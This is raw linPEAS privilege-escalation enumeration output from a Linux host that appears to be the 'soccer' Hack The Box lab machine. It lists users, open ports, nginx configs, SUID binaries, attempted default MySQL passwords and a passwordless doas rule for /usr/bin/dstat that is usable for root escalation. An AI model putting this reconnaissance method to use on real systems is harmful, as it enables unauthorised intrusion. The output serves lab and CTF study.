/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
└─(Read Write)
/run/udev/control
/run/user/1001/bus
└─(Read Write)
/run/user/1001/gnupg/S.dirmngr
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.browser
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.extra
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.ssh
└─(Read Write)
/run/user/1001/pk-debconf-socket
└─(Read Write)
/run/user/1001/snapd-session-agent.socket
└─(Read Write)
/run/user/1001/systemd/notify
└─(Read Write)
/run/user/1001/systemd/private
└─(Read Write)
/run/uuidd/request
└─(Read Write)
/run/vmware/guestServicePipe
└─(Read Write)
/var/run/mysqld/mysqld.sock
└─(Read Write)
/var/run/mysqld/mysqlx.sock
└─(Read Write)
/var/run/vmware/guestServicePipe
└─(Read Write)
/var/snap/lxd/common/lxd/unix.socket
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 - - - - - - -
:1.1 - - - - - - -
:1.11 - - - - - - -
:1.148 - - - - - - -
:1.156 - - - - - - -
:1.27 - - - - - - -
:1.3 - - - - - - -
:1.4 - - - - - - -
:1.5 - - - - - - -
:1.6 - - - - - - -
:1.7 - - - - - - -
:1.8 - - - - - - -
:1.9 - - - - - - -
com.ubuntu.LanguageSelector - - - (activatable) - - -
com.ubuntu.SoftwareProperties - - - (activatable) - - -
org.freedesktop.Accounts - - - - - - -
org.freedesktop.DBus - - - - - - -
org.freedesktop.ModemManager1 - - - - - - -
org.freedesktop.PackageKit - - - (activatable) - - -
org.freedesktop.PolicyKit1 - - - - - - -
org.freedesktop.UDisks2 - - - - - - -
org.freedesktop.bolt - - - (activatable) - - -
org.freedesktop.fwupd - - - - - - -
org.freedesktop.hostname1 - - - (activatable) - - -
org.freedesktop.locale1 - - - (activatable) - - -
org.freedesktop.login1 - - - - - - -
org.freedesktop.network1 - - - - - - -
org.freedesktop.resolve1 - - - - - - -
org.freedesktop.systemd1 - - - - - - -
org.freedesktop.timedate1 - - - (activatable) - - -
org.freedesktop.timesync1 - - - (activatable) - - -
╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
soccer
127.0.0.1 localhost soccer soccer.htb soc-player.soccer.htb
127.0.1.1 ubuntu-focal ubuntu-focal
nameserver 127.0.0.53
options edns0 trust-ad
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.194 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:b17b prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:b17b prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:b1:7b txqueuelen 1000 (Ethernet)
RX packets 229490 bytes 33975517 (33.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 241272 bytes 72136368 (72.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 102027 bytes 23742553 (23.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 102027 bytes 23742553 (23.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:9091 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=1001(player) gid=1001(player) groups=1001(player)
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Sorry, try again.
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
╔══════════╣ Checking doas.conf
permit nopass player as root cmd /usr/bin/dstat
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
player:x:1001:1001::/home/player:/bin/bash
root:x:0:0:root:/root:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1001(player) gid=1001(player) groups=1001(player)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=110(landscape) gid=115(landscape) groups=115(landscape)
uid=111(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=112(fwupd-refresh) gid=116(fwupd-refresh) groups=116(fwupd-refresh)
uid=113(mysql) gid=121(mysql) groups=121(mysql)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=997(_laurel) gid=997(_laurel) groups=997(_laurel)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
╔══════════╣ Login now
07:08:33 up 20:03, 2 users, load average: 0.14, 0.04, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons
root tty1 Fri Dec 2 10:53:47 2022 - down (00:01) 0.0.0.0
reboot system boot Fri Dec 2 10:53:14 2022 - Fri Dec 2 10:54:54 2022 (00:01) 0.0.0.0
root tty1 Fri Dec 2 10:50:00 2022 - down (00:03) 0.0.0.0
reboot system boot Fri Dec 2 10:48:18 2022 - Fri Dec 2 10:53:08 2022 (00:04) 0.0.0.0
player pts/0 Fri Dec 2 09:16:09 2022 - Fri Dec 2 09:18:16 2022 (00:02) 10.10.14.40
reboot system boot Fri Dec 2 09:14:12 2022 - Fri Dec 2 09:18:19 2022 (00:04) 0.0.0.0
player pts/0 Thu Dec 1 19:01:52 2022 - Thu Dec 1 19:09:17 2022 (00:07) 10.10.14.40
reboot system boot Thu Dec 1 19:01:06 2022 - Thu Dec 1 19:09:20 2022 (00:08) 0.0.0.0
wtmp begins Thu Dec 1 19:01:06 2022
╔══════════╣ Last time logon each user
Username Port From Latest
root tty1 Fri Dec 2 10:53:47 +0000 2022
player pts/2 10.10.16.6 Sun Mar 19 07:03:42 +0000 2023
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/local/bin/doas
/usr/bin/g++
/usr/bin/gcc
/snap/bin/lxc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
ii g++ 4:9.3.0-1ubuntu2 amd64 GNU C++ compiler
ii g++-9 9.4.0-1ubuntu1~20.04.1 amd64 GNU C++ compiler
ii gcc 4:9.3.0-1ubuntu2 amd64 GNU C compiler
ii gcc-9 9.4.0-1ubuntu1~20.04.1 amd64 GNU C compiler
/usr/bin/gcc
╔══════════╣ MySQL version
mysql Ver 8.0.31-0ubuntu0.20.04.2 for Linux on x86_64 ((Ubuntu))
═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No
╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user = mysql
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/
╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw------- 1 root root 317 Dec 1 18:13 /etc/mysql/debian.cnf
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.41 (Ubuntu)
Server built: 2022-06-14T13:30:55
httpd Not Found
Nginx version:
/etc/apache2/mods-available/php7.4.conf-
/etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.4.conf-
/etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php-source
══╣ Nginx modules
ngx_http_image_filter_module.so
ngx_http_xslt_filter_module.so
ngx_mail_module.so
ngx_stream_module.so
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Dec 1 13:48 /etc/nginx/sites-enabled
drwxr-xr-x 2 root root 4096 Dec 1 13:48 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 41 Nov 17 08:39 /etc/nginx/sites-enabled/soc-player.htb -> /etc/nginx/sites-available/soc-player.htb
server {
listen 80;
listen [::]:80;
server_name soc-player.soccer.htb;
root /root/app/views;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection ' upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}
lrwxrwxrwx 1 root root 34 Nov 17 08:06 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
server {
listen 80;
listen [::]:80;
server_name 0.0.0.0;
return 301 http://soccer.htb$request_uri;
}
server {
listen 80;
listen [::]:80;
server_name soccer.htb;
root /var/www/html;
index index.html tinyfilemanager.php;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php7.4-fpm.sock;
}
location ~ /\.ht {
deny all;
}
}
-rw-r--r-- 1 root root 72941 Nov 2 09:53 /etc/php/7.4/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72539 Nov 2 09:53 /etc/php/7.4/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72941 Nov 2 09:53 /etc/php/7.4/fpm/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 1490 Feb 4 2019 /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
}
http {
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
include /etc/nginx/mime.types;
default_type application/octet-stream;
ssl_prefer_server_ciphers on;
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
gzip on;
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
-rw-r--r-- 1 root root 389 Feb 4 2019 /etc/default/nginx
-rwxr-xr-x 1 root root 4579 Feb 4 2019 /etc/init.d/nginx
-rw-r--r-- 1 root root 329 Feb 4 2019 /etc/logrotate.d/nginx
drwxr-xr-x 8 root root 4096 Nov 17 08:06 /etc/nginx
lrwxrwxrwx 1 root root 48 Nov 17 08:06 /etc/nginx/modules-enabled/50-mod-mail.conf -> /usr/share/nginx/modules-available/mod-mail.conf
load_module modules/ngx_mail_module.so;
lrwxrwxrwx 1 root root 61 Nov 17 08:06 /etc/nginx/modules-enabled/50-mod-http-image-filter.conf -> /usr/share/nginx/modules-available/mod-http-image-filter.conf
load_module modules/ngx_http_image_filter_module.so;
lrwxrwxrwx 1 root root 50 Nov 17 08:06 /etc/nginx/modules-enabled/50-mod-stream.conf -> /usr/share/nginx/modules-available/mod-stream.conf
load_module modules/ngx_stream_module.so;
lrwxrwxrwx 1 root root 60 Nov 17 08:06 /etc/nginx/modules-enabled/50-mod-http-xslt-filter.conf -> /usr/share/nginx/modules-available/mod-http-xslt-filter.conf
load_module modules/ngx_http_xslt_filter_module.so;
-rw-r--r-- 1 root root 423 Feb 4 2019 /etc/nginx/snippets/fastcgi-php.conf
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
try_files $fastcgi_script_name =404;
set $path_info $fastcgi_path_info;
fastcgi_param PATH_INFO $path_info;
fastcgi_index index.php;
include fastcgi.conf;
-rw-r--r-- 1 root root 217 Feb 4 2019 /etc/nginx/snippets/snakeoil.conf
ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;
ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;
-rw-r--r-- 1 root root 1490 Feb 4 2019 /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
}
http {
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
include /etc/nginx/mime.types;
default_type application/octet-stream;
ssl_prefer_server_ciphers on;
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
gzip on;
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
-rw-r--r-- 1 root root 1077 Feb 4 2019 /etc/nginx/fastcgi.conf
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param QUERY_STRING $query_string;
fastcgi_param REQUEST_METHOD $request_method;
fastcgi_param CONTENT_TYPE $content_type;
fastcgi_param CONTENT_LENGTH $content_length;
fastcgi_param SCRIPT_NAME $fastcgi_script_name;
fastcgi_param REQUEST_URI $request_uri;
fastcgi_param DOCUMENT_URI $document_uri;
fastcgi_param DOCUMENT_ROOT $document_root;
fastcgi_param SERVER_PROTOCOL $server_protocol;
fastcgi_param REQUEST_SCHEME $scheme;
fastcgi_param HTTPS $https if_not_empty;
fastcgi_param GATEWAY_INTERFACE CGI/1.1;
fastcgi_param SERVER_SOFTWARE nginx/$nginx_version;
fastcgi_param REMOTE_ADDR $remote_addr;
fastcgi_param REMOTE_PORT $remote_port;
fastcgi_param SERVER_ADDR $server_addr;
fastcgi_param SERVER_PORT $server_port;
fastcgi_param SERVER_NAME $server_name;
fastcgi_param REDIRECT_STATUS 200;
-rw-r--r-- 1 root root 374 Feb 4 2019 /etc/ufw/applications.d/nginx
drwxr-xr-x 3 root root 4096 Nov 17 08:06 /usr/lib/nginx
-rwxr-xr-x 1 root root 1195152 Nov 10 06:38 /usr/sbin/nginx
drwxr-xr-x 2 root root 4096 Nov 17 08:06 /usr/share/doc/nginx
drwxr-xr-x 4 root root 4096 Nov 17 08:06 /usr/share/nginx
-rw-r--r-- 1 root root 53 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-image-filter.conf
load_module modules/ngx_http_image_filter_module.so;
-rw-r--r-- 1 root root 52 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-xslt-filter.conf
load_module modules/ngx_http_xslt_filter_module.so;
-rw-r--r-- 1 root root 42 Nov 10 06:38 /usr/share/nginx/modules-available/mod-stream.conf
load_module modules/ngx_stream_module.so;
-rw-r--r-- 1 root root 40 Nov 10 06:38 /usr/share/nginx/modules-available/mod-mail.conf
load_module modules/ngx_mail_module.so;
drwxr-xr-x 7 root root 4096 Nov 17 08:06 /var/lib/nginx
find: ‘/var/lib/nginx/proxy’: Permission denied
find: ‘/var/lib/nginx/scgi’: Permission denied
find: ‘/var/lib/nginx/fastcgi’: Permission denied
find: ‘/var/lib/nginx/uwsgi’: Permission denied
find: ‘/var/lib/nginx/body’: Permission denied
drwxr-xr-x 2 root adm 4096 Mar 19 00:00 /var/log/nginx
╔══════════╣ Analyzing FastCGI Files (limit 70)
-rw-r--r-- 1 root root 1007 Feb 4 2019 /etc/nginx/fastcgi_params
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Aug 16 2022 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Nov 15 21:40 /etc/ldap
╔══════════╣ Searching ssl/ssh files
PasswordAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/pki/fwupd-metadata/LVFS-CA.pem
/etc/pki/fwupd/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/snap/core20/1695/etc/ssl/certs/ACCVRAIZ1.pem
/snap/core20/1695/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/snap/core20/1695/etc/ssl/certs/AC_RAIZ_FNMT-RCM_SERVIDORES_SEGUROS.pem
/snap/core20/1695/etc/ssl/certs/ANF_Secure_Server_Root_CA.pem
/snap/core20/1695/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/snap/core20/1695/etc/ssl/certs/AffirmTrust_Commercial.pem
/snap/core20/1695/etc/ssl/certs/AffirmTrust_Networking.pem
/snap/core20/1695/etc/ssl/certs/AffirmTrust_Premium.pem
/snap/core20/1695/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/snap/core20/1695/etc/ssl/certs/Amazon_Root_CA_1.pem
/snap/core20/1695/etc/ssl/certs/Amazon_Root_CA_2.pem
/snap/core20/1695/etc/ssl/certs/Amazon_Root_CA_3.pem
/snap/core20/1695/etc/ssl/certs/Amazon_Root_CA_4.pem
/snap/core20/1695/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/snap/core20/1695/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/snap/core20/1695/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/snap/core20/1695/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
308505PSTORAGE_CERTSBIN
══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Dec 1 18:14 /etc/pam.d
-rw-r--r-- 1 root root 2133 Mar 30 2022 /etc/pam.d/sshd
╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions
tmux 3.0a
/tmp/tmux-1001
╔══════════╣ Analyzing Cloud Init Files (limit 70)
-rw-r--r-- 1 root root 3787 Oct 3 16:57 /snap/core20/1695/etc/cloud/cloud.cfg
lock_passwd: True
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 200 Oct 27 15:47 /snap/core20/1695/usr/share/keyrings
drwxr-xr-x 2 root root 4096 Dec 1 18:12 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /snap/core20/1695/etc/pam.d/passwd
passwd file: /snap/core20/1695/etc/passwd
passwd file: /snap/core20/1695/usr/share/bash-completion/completions/passwd
passwd file: /snap/core20/1695/usr/share/lintian/overrides/passwd
passwd file: /snap/core20/1695/var/lib/extrausers/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing Github Files (limit 70)
drwxr-xr-x 3 root root 4096 Nov 17 08:06 /usr/lib/node_modules/npm/node_modules/node-gyp/.github
drwxr-xr-x 3 root root 4096 Nov 17 08:06 /usr/lib/node_modules/npm/node_modules/node-gyp/gyp/.github
drwxr-xr-x 3 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/ast-types/.github
drwxr-xr-x 2 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/balanced-match/.github
drwxr-xr-x 3 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/proxy-agent/.github
drwxr-xr-x 2 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/resolve/.github
drwxr-xr-x 2 root root 4096 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/supports-preserve-symlinks-flag/.github
drwxr-xr-x 8 www-data www-data 4096 Mar 18 11:42 /tmp/CVE-2022-0185/.git
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw------- 1 player player 1200 Mar 19 03:58 /home/player/.gnupg/trustdb.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /snap/core20/1695/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /snap/core20/1695/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /snap/core20/1695/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /snap/core20/1695/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /snap/core20/1695/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 3267 Jul 4 2022 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2206 Nov 17 08:06 /usr/share/keyrings/nodesource.gpg
-rw-r--r-- 1 root root 2247 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg
-rw-r--r-- 1 root root 2274 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 2250 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg
-rw-r--r-- 1 root root 2235 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-ros.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 13 2020 /usr/share/popularity-contest/debian-popcon.gpg
drwx------ 3 player player 4096 Mar 19 07:08 /home/player/.gnupg
╔══════════╣ Analyzing Cache Vi Files (limit 70)
lrwxrwxrwx 1 root root 9 Nov 17 09:02 /home/player/.viminfo -> /dev/null
╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
-rw-r--r-- 1 root root 477 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/io/docker-compose.yml
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 813 Feb 2 2020 /snap/core20/1695/usr/share/bash-completion/completions/postfix
-rw-r--r-- 1 root root 813 Feb 2 2020 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 69 Nov 2 09:53 /etc/php/7.4/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Nov 2 09:53 /usr/share/php7.4-common/common/ftp.ini
╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r----- 1 www-data adm 8751 Mar 19 07:01 /var/log/nginx/access.log
-rw-r----- 1 www-data adm 0 Mar 19 00:00 /var/log/nginx/error.log
╔══════════╣ Analyzing Windows Files (limit 70)
lrwxrwxrwx 1 root root 20 Nov 17 08:10 /etc/alternatives/my.cnf -> /etc/mysql/mysql.cnf
lrwxrwxrwx 1 root root 24 Nov 17 08:09 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 81 Dec 1 18:13 /var/lib/dpkg/alternatives/my.cnf
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25 2020 /etc/skel/.bashrc
-rw-r--r-- 1 player player 3771 Feb 25 2020 /home/player/.bashrc
-rw-r--r-- 1 root root 3771 Feb 25 2020 /snap/core20/1695/etc/skel/.bashrc
-rw------- 1 player player 36 Mar 19 05:23 /home/player/.lesshst
-rw-r--r-- 1 root root 807 Feb 25 2020 /etc/skel/.profile
-rw-r--r-- 1 player player 807 Feb 25 2020 /home/player/.profile
-rw-r--r-- 1 root root 807 Feb 25 2020 /snap/core20/1695/etc/skel/.profile
╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 42K Nov 17 09:09 /usr/local/bin/doas
